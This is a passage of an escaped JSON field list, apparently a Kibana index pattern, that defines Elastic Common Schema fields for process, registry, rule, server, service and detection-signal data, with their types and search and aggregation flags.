cValues\":true},{\"count\":0,\"name\":\"process.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.parent.args\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.args_count\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.exists\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.status\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.subject_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.trusted\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.code_signature.valid\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.command_line.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.command_line\"}}},{\"count\":0,\"name\":\"process.parent.entity_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.executable.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.executable\"}}},{\"count\":0,\"name\":\"process.parent.exit_code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.name\"}}},{\"count\":0,\"name\":\"process.parent.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.title\"}}},{\"count\":0,\"name\":\"process.parent.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.parent.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.parent.working_directory\"}}},{\"count\":0,\"name\":\"process.pe.company\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.file_version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.original_file_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pe.product\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pgid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.ppid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.id\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.thread.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.title.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.title\"}}},{\"count\":0,\"name\":\"process.uptime\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.working_directory.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.working_directory\"}}},{\"count\":0,\"name\":\"registry.data.bytes\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.strings\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.data.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.hive\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.key\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"registry.value\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"related.user\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.license\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.ruleset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.uuid\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"rule.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.number\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.as.organization.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.as.organization.name\"}}},{\"count\":0,\"name\":\"server.bytes\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.nat.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.packets\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.full_name\"}}},{\"count\":0,\"name\":\"server.user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"server.user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"server.user.name\"}}},{\"count\":0,\"name\":\"service.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.node.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.state\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.ancestors.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.depth\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.group.index\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"signal.original_event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.original_time\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.depth\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.index\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.rule\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.parents.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.author\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.building_block_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_at\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.created_by\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.enabled\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.false_positives\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.from\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"signal.rule.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":